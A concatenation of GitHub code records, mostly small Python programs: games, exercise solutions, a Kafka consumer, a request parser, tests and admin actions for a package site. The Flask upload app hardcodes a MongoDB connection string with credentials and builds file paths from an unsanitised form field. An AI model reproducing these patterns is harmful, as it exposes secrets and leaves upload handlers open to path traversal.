spela igen efter man vunnit eller förlorat\n try_again = input(bcolors.DEFAULT + 'Spela igen? (Enter = Ja / N = Nej) ').upper()\n if try_again == 'N' or try_again == 'NEJ':\n print('Tack för du spelade - ses nästa gång!')\n exit() #Här kan man använda break istället - men gör såhär för att avsluta direkt\n","repo_name":"wrangman/GissaTalet","sub_path":"gissatalet.py","file_name":"gissatalet.py","file_ext":"py","file_size_in_byte":2121,"program_lang":"python","lang":"sv","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11442545835","text":"#this program will read the steps.csv file, calculate the average number of steps in a given month, and output \n#the average steps per month and the month name in a new csv file. \n\n#import csv module \nimport csv\n\n#call main\ndef main():\n\n #open files\n infile = open('steps.csv', 'r')\n outfile = open('avg._steps.csv', 'w')\n\n #read contents into csv object\n csvfile = csv.reader(infile, delimiter = ',')\n\n #skip first row \n next(csvfile)\n\n #build for loop \n \n months = [['1','January'], ['2', 'February'], ['3', 'March'], ['4', 'April'], ['5','May'],['6','June'],['7','July'],['8','August'],['9','September'],['10','October'],['11','November'],['12','December']]\n\n monthly_counter = 0\n monthly_bin = 0\n daily_counter = 0\n average = 0\n\n for line in csvfile: \n monthly_value = line [0]\n daily_value = line [1]\n if monthly_value == months[int(monthly_counter)][0]: \n monthly_bin = int(daily_value) + monthly_bin\n daily_counter += 1\n else: \n average = int(monthly_bin) // int(daily_counter) \n outfile.write(months[monthly_counter][1] + ':' + ' ' + str(average) + '\\n')\n monthly_counter += 1\n daily_counter = 0\n average = 0\n monthly_bin = 0\n\n \n #close the outfile\n outfile.close()\n\n#call main\nmain()\n","repo_name":"kwilliams-98/ReadAndWriteFiles","sub_path":"avg_steps.py","file_name":"avg_steps.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38349012513","text":"\"\"\"\nDescription:\n\nThe input is a string str of digits. Cut the string into chunks (a chunk here is\na substring of the initial string) of size sz (ignore the last chunk if its\nsize is less than sz).\n\nIf a chunk represents an integer such as the sum of the cubes of its digits is\ndivisible by 2, reverse that chunk; otherwise rotate it to the left by one\nposition. Put together these modified chunks and return the result as a string.\n\"\"\"\n\n\ndef check_number(str_num):\n return not sum(map(int, list(str_num))) % 2\n\n\ndef str_reverse(string):\n return \"\".join([symb for symb in string[::-1]])\n\n\ndef revrot(strng, sz):\n res = \"\"\n if sz <= 0 or not strng:\n return res\n for i in range(len(strng) // sz):\n # print(strng[i * sz:(i + 1) * sz])\n if len(strng[i * sz:]) < sz:\n return res\n if check_number(strng[i * sz:(i + 1) * sz]):\n # print(str_reverse(strng[i * sz:(i + 1) * sz]))\n res += str_reverse(strng[i * sz:(i + 1) * sz])\n else:\n res += strng[i * sz + 1:(i + 1) * sz] + strng[i * sz]\n return res\n\n\nif __name__ == \"__main__\":\n s = \"73304991087281576455176044327690580265896\"\n ans = \"1994033775182780067155464327690480265895\"\n print(revrot(s, 8), ans, sep=\"\\n\")\n assert revrot(s, 8) == ans\n","repo_name":"MaximSinyaev/CodeWars","sub_path":"c6kyu/reverse_or_rotate.py","file_name":"reverse_or_rotate.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"39372974428","text":"#Author Adolfo Lara June 25 2020\n\nimport random\n# Exercise: You are infected with bacteria characterized as: 13 blue, 6 red, and 1 white.\n#In this infection, white bacteria is the hardest to kill.\nbluebac=13\nredbac=6\nwhitebac=1\n\n#As part of the treatment, we will mimic medicine with dice. This list represents a dice roll 1-6.\n#1,3,5,6 - you took medicine: remove 3 bacteria (blue first).\n#2 or 4 - you forgot medicine: remove 0 bacteria, add 1 of each.\nt = [1, 2, 3, 4, 5, 6]\n\n#Antibiotics you take are for 10 days, thus variable \"i\" keeps track of them.\ni = 0\n\n#If you roll a \"1, 3, 5, 6\" this means you took your antibiotics.\n#If you took your antibiotics, 3 bacteria die and none reproduce.\n#The loop below will take away 3 bacteria at a time, starting with the blue then red and finally white bacteria.\n\n#If you roll a \"2, 4\" this means you did not take your antibiotics.\n#If you did not take your antibiotics, the bacteria will reproduce.\n#The loop below will add 1 to each of the blue, red, and white, bacteria.\n\n#At the end of 10 tries (days) if you have more than 5 white bacteria, bacteria win. \nwhile i < 10:\n\ts = random.choice(t)\n\tif bluebac > 0 and s==1:\n\t\tbluebac = bluebac - 3\n\tif bluebac > 0 and s==3:\n\t\tbluebac = bluebac - 3\n\tif bluebac > 0 and s==5:\n\t\tbluebac = bluebac - 3\n\tif bluebac > 0 and s==6:\n\t\tbluebac = bluebac - 3\n\t\n\tif bluebac <= 0 and redbac > 0 and s==1:\n\t\tredbac = redbac - 3\n\tif bluebac <= 0 and redbac > 0 and s==3:\n\t\tredbac = redbac - 3\n\tif bluebac <= 0 and redbac > 0 and s==5:\n\t\tredbac = redbac - 3\n\tif bluebac <= 0 and redbac > 0 and s==6:\n\t\tredbac = redbac - 3\n\t\n\tif bluebac <= 0 and redbac <= 0 and whitebac > 0 and s==1:\n\t\twhitebac = whitebac - 3\n\tif bluebac <= 0 and redbac <= 0 and whitebac > 0 and s==3:\n\t\twhitebac = whitebac - 3\n\tif bluebac <= 0 and redbac <= 0 and whitebac > 0 and s==5:\n\t\twhitebac = whitebac - 3\n\tif bluebac <= 0 and redbac <= 0 and whitebac > 0 and s==6:\n\t\twhitebac = whitebac - 3\n\t\n\tif s==2:\n\t\tbluebac = bluebac + 1\n\t\tredbac = redbac + 1\n\t\twhitebac = whitebac + 1\n\tif s==4:\n\t\tbluebac = bluebac + 1\n\t\tredbac = redbac + 1\n\t\twhitebac = whitebac + 1\n\tprint('Your dice-roll number',i+1,'is',s)\n\tprint(bluebac,redbac,whitebac)\n\ti = i + 1\n\nif whitebac >= 5:\n\tprint('Your distribution of bacteria after 10 days are:',bluebac,'blue',redbac,'red',whitebac, 'white,', 'this means bacteria won.')\nelif whitebac < 5:\n\tprint('Your distribution of bacteria after 10 days are:',bluebac,'blue',redbac,'red',whitebac, 'white,', 'this means you are alive.')\n","repo_name":"alaragit/Teaching","sub_path":"UB2020-antibiotics_exercise/antibiotics_code.py","file_name":"antibiotics_code.py","file_ext":"py","file_size_in_byte":2506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"40774951359","text":"from flask import Flask, render_template, request, redirect, url_for, jsonify\nfrom datetime import datetime\nfrom pymongo import MongoClient\n\napp = Flask(__name__)\n\nclient = MongoClient('mongodb+srv://test:sparta@cluster0.0pi7g.mongodb.net/Cluster0?retryWrites=true&w=majority') # 클라이언트 설정시 작성\ndb = client.dbsparta\n\n#################################\n## HTML을 주는 부분 ##\n#################################\n@app.route('/')\ndef home():\n return render_template('index.html')\n\n# 방식1 : DB에는 파일 이름만 넣어놓고, 이미지 자체는 서버 컴퓨터에 저장하는 방식\n@app.route('/fileupload', methods=['POST'])\ndef file_upload():\n # and 닉네임 변경 \n title_receive = request.form['title_give']\n file = request.files['file_give']\n # 해당 파일에서 확장자명만 추출\n extension = file.filename.split('.')[-1]\n # 파일 이름이 중복되면 안되므로, 지금 시간을 해당 파일 이름으로 만들어서 중복이 되지 않게 함!\n today = datetime.now()\n mytime = today.strftime('%Y-%m-%d-%H-%M-%S')\n filename = f'{title_receive}-{mytime}'\n # 파일 저장 경로 설정 (파일은 db가 아니라, 서버 컴퓨터 자체에 저장됨)\n save_to = f'static/{filename}.{extension}'\n # 파일 저장!\n file.save(save_to)\n \n # 아래와 같이 입력하면 db에 추가 가능!\n doc = {'title':title_receive, 'img':f'{filename}.{extension}'}\n db.camp.insert_one(doc)\n\n return jsonify({'result':'success'})\n\n# 주소에다가 /fileshow/이미지타이틀 입력하면 그 이미지타이틀을 title이라는 변수로 받아옴\n@app.route('/fileshow/')\ndef file_show(title):\n # title은 현재 이미지타이틀이므로, 그것을 이용해서 db에서 이미지 '파일'의 이름을 가지고 옴\n img_info = db.camp.find_one({'title': title})\n # 해당 이미지 정보를 jinja 형식으로 사용하기 위해 넘김\n return render_template('showimg.html', img_info=img_info)\n\nif __name__ == '__main__':\n app.run('0.0.0.0', port=5000, debug=True)","repo_name":"bae-code/git_prac","sub_path":"test_pic/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"33759724452","text":"import re\n\ndef do_part1(my_input):\n print(\" P A R T 0 1\")\n print(\"I N I T I A L V A L U E : \"+str(my_input))\n my_output = 0\n with open('aoc01-input.txt', 'r') as my_file:\n for line in my_file:\n my_output += int(line)\n print(\" O U T P U T : \"+ str(my_output))\n\ndef do_part2(my_input):\n print(\" P A R T 0 2\")\n print(\"I N I T I A L V A L U E : \"+str(my_input))\n my_freq_history = {my_input}\n my_freq = 0\n is_found = False\n\n with open('aoc01-input.txt', 'r') as my_file:\n my_lines = my_file.readlines()\n\n i = 0\n while (i < len(my_lines)) and not is_found:\n my_freq += int(my_lines[i])\n if my_freq in my_freq_history:\n # do something\n my_output = my_freq\n is_found = True\n else:\n my_freq_history.add(my_freq)\n i = i + 1\n if i == len(my_lines) and not is_found:\n i = 0\n\n print(\" O U T P U T : \"+ str(my_output))\n\nmy_input = 0\ndo_part1(my_input)\n\ndo_part2(my_input)","repo_name":"robynsen/adventofcode2018","sub_path":"aoc01.py","file_name":"aoc01.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"36991366788","text":"import networkx as nx\nimport re\n\n\nclass ExploreGraph:\n\n # Creator : Quentin Nater\n # reviewed by : Sophie Caroni\n #\n # asin : string - ID of the node\n #\n # Convert the id (ASIN) into a INT unique value\n def convert_asin_to_int(asin):\n alphabet = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n if any(char.isalpha() for char in asin): # isalpha() returns True if it detects letters\n for char in asin:\n if char.isalpha():\n asin = asin.replace(char, str(alphabet.index(char.upper()) + 10))\n\n return int(asin)\n\n # Creator : Quentin Nater\n # reviewed by : Sophie Caroni\n #\n # filename : string - path to the dataset\n # limit : int - limit of the line to read (sample)\n # display : bool - display the results of the analysis\n # displayDetail : bool - display the detail of the construction\n #\n # Construct a complex graph with a file\n def construct_graph_by_file(file_name, limit=15010574, display=True, displayDetail=False):\n print(\">> You have called the construction of your graph, please wait :)\")\n\n # initialization of the variables\n graph = nx.DiGraph()\n i, asin_int, notOutEdged = 0, 0, 0\n list_asin, list_similars, list_not_out_edged, list_not_in_edged, list_extern = [], [], [], [], []\n\n # read every information of the file (dataset)\n with open(file_name, \"r\", encoding='utf-8') as f:\n for line in f:\n i += 1 # inc break\n\n # read nodes ===============================================\n match = re.search(r'ASIN:\\s*(\\w+)', line) # each ASIN\n if match:\n asin = match.group(1) # Take the first element matched\n\n # add a node to the graph for the ASIN value (INT)\n asin_int = ExploreGraph.convert_asin_to_int(asin)\n graph.add_node(asin_int)\n list_asin.append(asin_int)\n\n # read edges ===============================================\n match = re.search(r'similar:\\s*(\\w+)', line) # each similar\n if match:\n similars = line.split(sep=\" \") # Create a list of each one of the similars as an element\n inc = 0\n\n for similar in similars:\n inc += 1\n\n if inc > 2: # if more than 0 categories ## ??? categories? why inc > 2? and why 0 and not 2?\n similar_int = ExploreGraph.convert_asin_to_int(similar) # casting\n list_similars.append(similar_int)\n graph.add_edge(*(asin_int, similar_int)) # Add edges between the asin product and each of its similar ones\n\n if displayDetail:\n print(\"\\t\\t\\t\\t(\" + str(asin_int) + \", \" + str(similar_int) + \")\")\n\n elif len(similars) == 2: # information if it has 0 category (CHECK FOR ANALYSIS)\n notOutEdged += 0.5 # because read 2 times\n if notOutEdged % 1 == 0:\n asin_i = ExploreGraph.convert_asin_to_int(asin) # casting\n list_not_out_edged.append(asin_i)\n\n # Stop reading file when the given line limit is reached =======================================\n if i == limit:\n break\n\n nNodes, nEdges = graph.number_of_nodes(), graph.number_of_edges()\n print(\"\\t\\tThe graph has been successfully constructed! (nodes:\" + str(nNodes) + \", edges:\" + str(nEdges) + \")\")\n\n if display:\n list_similars = list(set(list_similars)) # remove redundancy (duplicates)\n list_not_out_edged = set(list_not_out_edged) # casting ## should'nt this be remove redundancy instead of casting?\n\n list_not_in_edged = set(list_asin) - set(list_similars) # find products with asin but not appearing as similars of others\n list_extern = set(list_similars) - set(list_asin) # find products appearing as similars but not defined in this dataset file\n\n total_isolated = list_not_in_edged & list_not_out_edged # find disconnected nodes\n\n print(\"\\t\\t\\t\\tASIN : \\t\\t\\t\\t\\t\\t\\t\" + str(len(list_asin)))\n print(\"\\t\\t\\t\\tSIMILARS (UNIQUES) \\t\\t\\t\\t\" + str(len(list_similars)))\n print(\"\\t\\t\\t\\tNOT IN-EDGED NODES: \\t\\t\\t\" + str(len(list_not_in_edged)))\n print(\"\\t\\t\\t\\tNODES CREATED OUTSIDE (FILE) : \\t\" + str(len(list_extern)))\n print(\"\\t\\t\\t\\tNOT OUT-EDGED NODES: \\t\\t\\t\" + str(int(notOutEdged)))\n print(\"\\t\\t\\t\\tISOLATED NODES: \\t\\t\\t\\t\" + str(len(total_isolated)))\n\n return graph","repo_name":"qnater/GraphProjectNeuroscience","sub_path":"explore/exploration_graph.py","file_name":"exploration_graph.py","file_ext":"py","file_size_in_byte":4880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"15274859603","text":"from confluent_kafka import Consumer, KafkaException\nfrom elasticsearch import Elasticsearch\nimport json\n\nfrom constant import INDEX_ELASTIC\n\n# Configuration du consommateur Kafka\nconf = {\n 'bootstrap.servers': 'kafka:9092',\n 'group.id': 'my-group',\n 'auto.offset.reset': 'latest' # Commencer à lire à la fin du topic\n}\n\nconsumer = Consumer(conf)\n\n# Configuration d'Elasticsearch\nes = Elasticsearch('http://localhost:9200')\nconsumer.subscribe(['cryptobot'])\n\ntry:\n while True:\n msg = consumer.poll(timeout=1.0) # Récupération des messages du topic\n if msg is None:\n continue\n if msg.error():\n if msg.error().code() == KafkaException._PARTITION_EOF:\n continue\n else:\n print(f\"Erreur rencontrée : {msg.error()}\")\n break\n\n # Traitement du message reçu depuis Kafka\n message_data = msg.value().decode('utf-8')\n parsed_message = json.loads(message_data)\n\n # Envoi des données à Elasticsearch\n es.index(index=INDEX_ELASTIC,\n body=parsed_message) # Remplacez 'nom_de_votre_index' par votre index Elasticsearch\nexcept KeyboardInterrupt:\n pass\n\nfinally:\n # Fermeture du consommateur Kafka\n consumer.close()\n","repo_name":"ndiguesene/projet_binance_2023_formation_datascientest_SENE_TALL_DIOUM","sub_path":"populate_base/elasticsearch/app_stream_elastic.py","file_name":"app_stream_elastic.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"29088066012","text":"from .._protos.public.uac import Collaborator_pb2\nfrom .._protos.public.common import CommonService_pb2\n\nfrom ._visibility import _Visibility\n\n\nclass OrgCustom(_Visibility):\n \"\"\"\n Organization-wide access with manually-specified permissions.\n\n .. note::\n\n With an older ModelDB backend that does not support new permissions\n values, this will be converted to :class:`~verta.visibility.OrgDefault`.\n\n Parameters\n ----------\n write : bool, default False\n Whether to allow organization members to write. ``False`` gives\n read-only access.\n deploy : bool, default False\n Whether to allow organization members to deploy. Only applicable to\n projects and registered models.\n\n Examples\n --------\n .. code-block:: python\n\n from verta.visibility import OrgCustom\n visibility = OrgCustom(write=True, deploy=True)\n client.create_project(\"My Project\", workspace=\"my-org\", visibility=visibility)\n\n \"\"\"\n def __init__(self, write=False, deploy=False):\n if not isinstance(write, bool):\n raise TypeError(\"`write` must be of type bool, not {}\".format(type(write)))\n if not isinstance(deploy, bool):\n raise TypeError(\"`deploy` must be of type bool, not {}\".format(type(deploy)))\n\n self._write = write\n self._deploy = deploy\n\n def __repr__(self):\n return \"<{}(write={}, deploy={}) visibility>\".format(self.__class__.__name__, self._write, self._deploy)\n\n def _to_public_within_org(self):\n # NOTE: old backends will unavoidably not receive `_write` and `_deploy`\n return True\n\n @property\n def _custom_permission(self):\n if self._write:\n collaborator_type = CommonService_pb2.CollaboratorTypeEnum.READ_WRITE\n else:\n collaborator_type = CommonService_pb2.CollaboratorTypeEnum.READ_ONLY\n\n if self._deploy:\n can_deploy = CommonService_pb2.TernaryEnum.TRUE\n else:\n can_deploy = CommonService_pb2.TernaryEnum.FALSE\n\n return Collaborator_pb2.CollaboratorPermissions(\n collaborator_type=collaborator_type,\n can_deploy=can_deploy,\n )\n\n @property\n def _visibility(self):\n return Collaborator_pb2.ResourceVisibility.ORG_CUSTOM\n","repo_name":"orgTestCodacy11KRepos110MB/repo-4483-modeldb","sub_path":"client/verta/verta/visibility/_org_custom.py","file_name":"_org_custom.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"24669875625","text":"import struct\nimport logging\nimport config\n\n\nMSG_TYPE_GET_SYM_KEY = 1\nMSG_TYPE_SEND_SYM_KEY = 2\nMSG_TYPE_SEND_TXT_MSG = 3\nMSG_TYPE_SEND_FILE = 4\nSUPPORTED_MSG_TYPES = [MSG_TYPE_GET_SYM_KEY, MSG_TYPE_SEND_FILE,\n MSG_TYPE_SEND_SYM_KEY, MSG_TYPE_SEND_TXT_MSG]\n\n# Message request fields' sizes\nFIELD_SIZE_MSG_TYPE_SIZE = 1\nFIELD_SIZE_MSG_CONTENT_SIZE = 4\n\nCODE_REGISTER = 1000\nCODE_LIST_CLIENTS = 1001\nCODE_FETCH_PUBLIC_KEY = 1002\nCODE_SEND_MSG = 1003\nCODE_FETCH_MESSAGES = 1004\nSUPPORTED_CODES = (CODE_REGISTER, CODE_LIST_CLIENTS, CODE_SEND_MSG,\n CODE_FETCH_MESSAGES, CODE_FETCH_PUBLIC_KEY)\n\n\nclass RequestHeaderStructure():\n FIELD_CLIENT_ID = (16, 's')\n FIELD_VERSION = (1, 'B')\n FIELD_CODE = (1, 'H')\n FIELD_PAYLOAD_SIZE = (1, 'I')\n\n\nclass Request():\n # header size in bytes\n HEADER_SIZE = 23\n MAX_PAYLOAD_SIZE = 0x7fffffff\n\n\n def __init__(self, raw_data = b\"\"):\n assert type(raw_data) == bytes\n self.__init_logger(self.__class__.__name__)\n\n self.__raw_data = raw_data\n self.__supported_version = config.SUPPORTED_VERSION\n self.is_valid = False\n \n self.__header_struct = struct.Struct(format = self.__get_formatter())\n self.__header = {}\n # important for the header decoding\n self.__init_header()\n \n if raw_data != b\"\":\n if self.decode_header(raw_data) and self.decode_payload(raw_data):\n self.is_valid = True\n \n\n def __get_formatter(self):\n # We are parsing little endian data from the network\n formatter = \">\"\n\n for field, value in vars(RequestHeaderStructure).items():\n if field.isupper():\n formatter += str(value[0]) + value[1]\n \n self.__log_debug(\"Formatter created: {}\".format(formatter))\n return formatter\n\n\n # Decode only the header\n def decode_header(self, raw_data):\n assert type(raw_data) == bytes\n\n if len(raw_data) < Request.HEADER_SIZE:\n self.__log_debug(\"Invalied header size\")\n return False\n\n header = raw_data[: Request.HEADER_SIZE]\n self.__parse_header(header)\n\n if self.__header[\"FIELD_VERSION\"] != self.__supported_version:\n self.__log_debug(\"Unsupported request version\")\n return False\n\n # check if payload size is not huge\n if self.__header[\"FIELD_PAYLOAD_SIZE\"] > Request.MAX_PAYLOAD_SIZE:\n self.__log_debug(\"Payload size unsupported\")\n return False\n\n if self.__header[\"FIELD_CODE\"] not in SUPPORTED_CODES:\n self.__log_debug(\"Invalid request code\")\n return False\n \n return True\n \n #the payload also includes the header!\n def decode_payload(self, raw_data):\n assert type(raw_data) == bytes\n \n if len(raw_data) < Request.HEADER_SIZE:\n self.__log_info(\"Invalid header size\")\n return False\n\n if len(raw_data) > Request.MAX_PAYLOAD_SIZE:\n self.__log_info(\"Received payload of unsupported size\")\n return False\n\n self.__log_debug(len(raw_data[Request.HEADER_SIZE :]))\n\n # validate payload size (TODO: should be done in a function)\n if len(raw_data[Request.HEADER_SIZE :]) != self.__header[\"FIELD_PAYLOAD_SIZE\"]:\n self.__log_debug(\"Invalid payload size\")\n return False\n\n self.__raw_data = raw_data\n\n return True\n\n\n def __init_header(self):\n fields = [field for field in vars(RequestHeaderStructure) if field.isupper()]\n\n for field in fields:\n self.__header.update({field : 0})\n\n\n def __parse_header(self, header):\n unpacked_data = self.__header_struct.unpack(header)\n \n fields = [field for field in vars(RequestHeaderStructure) if field.isupper()]\n\n for index, field in enumerate(fields):\n self.__header[field] = unpacked_data[index]\n\n self.__log_debug(\"Parsed header: {}\".format(self.__header))\n\n\n @property\n def client_id(self):\n return self.__header[\"FIELD_CLIENT_ID\"]\n\n @property\n def client_version(self):\n return self.__header[\"FIELD_VERSION\"]\n\n @property\n def request_code(self):\n return self.__header[\"FIELD_CODE\"]\n\n @property\n def payload(self):\n return self.__raw_data[Request.HEADER_SIZE :]\n\n @property\n def raw_data(self):\n return self.__raw_data\n \n @property\n def payload_size(self):\n return self.__header[\"FIELD_PAYLOAD_SIZE\"]\n \n \n def __init_logger(self, logger_name):\n self.__logger = logging.getLogger(logger_name)\n self.__logger.setLevel(logging.DEBUG)\n\n # create handler only once!\n if not self.__logger.hasHandlers(): \n sh = logging.StreamHandler()\n formatter = logging.Formatter(\"%(name)s - %(levelname)s - %(message)s\")\n sh.setFormatter(formatter)\n self.__logger.addHandler(sh)\n\n\n def __log_debug(self, msg):\n self.__logger.debug(msg)\n \n def __log_info(self, msg):\n self.__logger.info(msg)\n \n def __log_critical(self, msg):\n self.__logger.critical(msg)\n \n def __log_exception(self, msg):\n self.__logger.exception(msg)","repo_name":"yakovmora1/SocialNetworkProj","sub_path":"request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":5297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"33011291214","text":"from collections import defaultdict,deque\n\ndef parallelCourses(n, prerequisites):\n # Write your code here.\n \n graph = defaultdict(list)\n in_coming = defaultdict(int)\n queue = deque()\n ans = 0\n node_count = 0\n\n for a,b in prerequisites:\n graph[a].append(b)\n in_coming[b] += 1\n \n for i in range(1,n+1):\n if in_coming[i] == 0:\n queue.append(i)\n\n\n while queue:\n node_count += len(queue)\n\n for _ in range(len(queue)):\n node = queue.popleft()\n\n for neighbour in graph[node]:\n in_coming[neighbour] -= 1\n\n if in_coming[neighbour] == 0:\n queue.append(neighbour)\n \n ans += 1\n\n if node_count == n:\n return ans\n return -1\n \n \n","repo_name":"YabTek/codeforces","sub_path":"coding-ninjas/parallel-courses.py","file_name":"parallel-courses.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"6739874273","text":"import json\nimport random\nfrom pathlib import Path\nfrom typing import List, Dict, Any\nfrom copy import deepcopy\n\nimport pytest\nfrom faker import Faker\n\nfrom zensearch.store.file import FileStore\nfrom zensearch.model.user import User\nfrom zensearch.model.ticket import Ticket\nfrom zensearch.db.user_ticket_db import UserTicketDatabase\nfrom zensearch.index.inverted import InvertedIndex\nfrom zensearch.model.consts import USER_SCHEMA, TICKET_SCHEMA\n\nN_USERS = 100\nN_TICKETS = 1000\n\n\n@pytest.fixture()\ndef generate_linked_users_tickets():\n faker = Faker()\n users = []\n\n for id in range(N_USERS):\n user_record = USER_SCHEMA.copy()\n user_record[\"_id\"] = id\n user_record[\"name\"] = faker.name()\n user_record[\"_tickets\"] = []\n users.append(User(user_record))\n\n tickets = []\n\n for id in range(N_TICKETS):\n ticket_record = TICKET_SCHEMA.copy()\n\n # assign a random user to the ticket\n user_id = random.randint(0, N_USERS - 1)\n subject = \" \".join(faker.words(3))\n\n ticket_record[\"_id\"] = id\n ticket_record[\"assignee_id\"] = user_id\n ticket_record[\"subject\"] = subject\n tickets.append(Ticket(ticket_record))\n\n # append the ticket subject to its assignee\n users[user_id].record[\"_tickets\"].append(subject)\n return (users, tickets)\n\n\n@pytest.fixture()\ndef db(generate_linked_users_tickets):\n store = FileStore(Path(\"tests/resources\"))\n db = UserTicketDatabase(store)\n db.users = generate_linked_users_tickets[0]\n db.tickets = generate_linked_users_tickets[1]\n db.build_index()\n return db\n\n\ndef test_ticket_queries_return_linked_assignee(db):\n db.link_ticket_assignees()\n\n for ticket in db.tickets:\n document = db.query(\"tickets\", \"_id\", str(ticket.record[\"_id\"]), related=True)[\n 0\n ]\n assert (\n document[\"assignee_name\"]\n == db.users[ticket.record[\"assignee_id\"]].record[\"name\"]\n )\n\n\ndef test_user_queries_return_linked_tickets(db):\n db.link_users_tickets()\n\n for user in db.users:\n document = db.query(\"users\", \"_id\", str(user.id), related=True)[0]\n assert sorted(document[\"tickets\"]) == sorted(user.record[\"_tickets\"])\n","repo_name":"gh4n/search","sub_path":"tests/integration/test_user_ticket_linkage.py","file_name":"test_user_ticket_linkage.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"42619425179","text":"import os\nfrom typing import List\n\nimport requests\nfrom celery import group, uuid\nfrom flask import redirect, url_for, flash, current_app\nfrom sqlalchemy import or_, and_\n\nfrom app.models import PackageRelease, db, Package, PackageState, PackageScreenshot, MetaPackage, User, \\\n\tNotificationType, PackageUpdateConfig, License, UserRank, PackageType\nfrom app.tasks.emails import send_pending_digests\nfrom app.tasks.forumtasks import import_topic_list, check_all_forum_accounts\nfrom app.tasks.importtasks import import_repo_screenshot, check_zip_release, check_for_updates, update_all_game_support\nfrom app.utils import add_notification, get_system_user\n\nactions = {}\n\n\ndef action(title: str):\n\tdef func(f):\n\t\tname = f.__name__\n\t\tactions[name] = {\n\t\t\t\"title\": title,\n\t\t\t\"func\": f,\n\t\t}\n\n\t\treturn f\n\n\treturn func\n\n\n@action(\"Delete stuck releases\")\ndef del_stuck_releases():\n\tPackageRelease.query.filter(PackageRelease.task_id.isnot(None)).delete()\n\tdb.session.commit()\n\treturn redirect(url_for(\"admin.admin_page\"))\n\n\n@action(\"Import forum topic list\")\ndef import_topic_list():\n\ttask = import_topic_list.delay()\n\treturn redirect(url_for(\"tasks.check\", id=task.id, r=url_for(\"todo.topics\")))\n\n\n@action(\"Check all forum accounts\")\ndef check_all_forum_accounts():\n\ttask = check_all_forum_accounts.delay()\n\treturn redirect(url_for(\"tasks.check\", id=task.id, r=url_for(\"admin.admin_page\")))\n\n\n@action(\"Delete unused uploads\")\ndef clean_uploads():\n\tupload_dir = current_app.config['UPLOAD_DIR']\n\n\t(_, _, filenames) = next(os.walk(upload_dir))\n\texisting_uploads = set(filenames)\n\n\tif len(existing_uploads) != 0:\n\t\tdef get_filenames_from_column(column):\n\t\t\tresults = db.session.query(column).filter(column.isnot(None), column != \"\").all()\n\t\t\treturn set([os.path.basename(x[0]) for x in results])\n\n\t\trelease_urls = get_filenames_from_column(PackageRelease.url)\n\t\tscreenshot_urls = get_filenames_from_column(PackageScreenshot.url)\n\t\tpp_urls = get_filenames_from_column(User.profile_pic)\n\n\t\tdb_urls = release_urls.union(screenshot_urls).union(pp_urls)\n\t\tunreachable = existing_uploads.difference(db_urls)\n\n\t\timport sys\n\t\tprint(\"On Disk: \", existing_uploads, file=sys.stderr)\n\t\tprint(\"In DB: \", db_urls, file=sys.stderr)\n\t\tprint(\"Unreachable: \", unreachable, file=sys.stderr)\n\n\t\tfor filename in unreachable:\n\t\t\tos.remove(os.path.join(upload_dir, filename))\n\n\t\tflash(\"Deleted \" + str(len(unreachable)) + \" unreachable uploads\", \"success\")\n\telse:\n\t\tflash(\"No downloads to create\", \"danger\")\n\n\treturn redirect(url_for(\"admin.admin_page\"))\n\n\n@action(\"Delete unused mod names\")\ndef del_mod_names():\n\tquery = MetaPackage.query.filter(~MetaPackage.dependencies.any(), ~MetaPackage.packages.any())\n\tcount = query.count()\n\tquery.delete(synchronize_session=False)\n\tdb.session.commit()\n\n\tflash(\"Deleted \" + str(count) + \" unused mod names\", \"success\")\n\treturn redirect(url_for(\"admin.admin_page\"))\n\n\n@action(\"Run update configs\")\ndef run_update_config():\n\tcheck_for_updates.delay()\n\n\tflash(\"Started update configs\", \"success\")\n\treturn redirect(url_for(\"admin.admin_page\"))\n\n\ndef _package_list(packages: List[str]):\n\t# Who needs translations?\n\tif len(packages) >= 3:\n\t\tpackages[len(packages) - 1] = \"and \" + packages[len(packages) - 1]\n\t\tpackages_list = \", \".join(packages)\n\telse:\n\t\tpackages_list = \" and \".join(packages)\n\treturn packages_list\n\n\n@action(\"Send WIP package notification\")\ndef remind_wip():\n\tusers = User.query.filter(User.packages.any(or_(\n\t\t\tPackage.state == PackageState.WIP, Package.state == PackageState.CHANGES_NEEDED)))\n\tsystem_user = get_system_user()\n\tfor user in users:\n\t\tpackages = db.session.query(Package.title).filter(\n\t\t\t\tPackage.author_id == user.id,\n\t\t\t\tor_(Package.state == PackageState.WIP, Package.state == PackageState.CHANGES_NEEDED)) \\\n\t\t\t.all()\n\n\t\tpackages = [pkg[0] for pkg in packages]\n\t\tpackages_list = _package_list(packages)\n\t\thavent = \"haven't\" if len(packages) > 1 else \"hasn't\"\n\n\t\tadd_notification(user, system_user, NotificationType.PACKAGE_APPROVAL,\n\t\t\tf\"Did you forget? {packages_list} {havent} been submitted for review yet\",\n\t\t\t\t\t\t url_for('todo.view_user', username=user.username))\n\tdb.session.commit()\n\n\n@action(\"Send outdated package notification\")\ndef remind_outdated():\n\tusers = 